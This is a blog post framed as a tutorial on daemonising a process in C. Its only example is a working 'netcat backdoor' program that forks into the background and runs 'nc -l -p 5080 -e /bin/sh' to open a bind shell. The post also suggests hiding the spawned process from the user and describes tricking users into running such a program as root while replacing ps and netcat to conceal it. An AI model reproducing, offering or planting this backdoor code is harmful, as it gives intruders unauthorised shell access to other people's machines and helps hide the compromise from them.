How to fork off a process from a program in C. Simple netcat example.

Posted: August 24, 2015. At: 5:28 PM. This was 2 years ago. Post ID: 8323
Page permalink.
WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters. These cookies expire two weeks after they are set.

This post will explain how to fork() off a daemon process from a program in C. This is good if you wish to run a process on a machine after the program has finished and you have been returned to the command prompt. The sample program below uses the int daemon(int nochdir, int noclose); function to spawn a separate process when the program is run. This means that you could show the user one thing and spawn something else in the background.

*  This program is free software: you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation, either version 3 of the License, or
*  (at your option) any later version.
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  GNU General Public License for more details.
*  You should have received a copy of the GNU General Public License
*  along with this program.  If not, see <>.
* Description: Netcat backdoor program.
* Author: John Cartwright,,, <>
* Created at: Mon Aug 24 12:56:48 AEST 2015
* Computer: darkstar
* System: Linux 3.16.0-4-amd64 on x86_64
* Copyright (c) 2015 John Cartwright,,,  All rights reserved.
#include <stdio.h>
#include <unistd.h>
int main (int argc, char *argv[]) {
	printf("#***             Simple netcat backdoor.           ***#");
// Start a netcat backdoor, running in the background.
	daemon(1,1); // fork() off into a daemon process.
	extern char * const environ[];
	char * const command[] = {"nc", "-l", "-p", "5080", "-e", "/bin/sh", NULL};
	execve("/bin/nc", command, environ);
	return 0;

The only problem with this is the user can see the process running with the ps ax command. The thing is that if a malicious programmer wants to create a backdoor rootkit, they would trick the user into running the program as root. Then the program would replace the ps, netcat and related commands. This means that if a user runs netcat or ps, they would not see the hidden processes. But the ease of use of the daemon() function makes it perfect for this task.

Read more about this function here:

No comments have been made. Use this form to start the conversation :)

Leave a Reply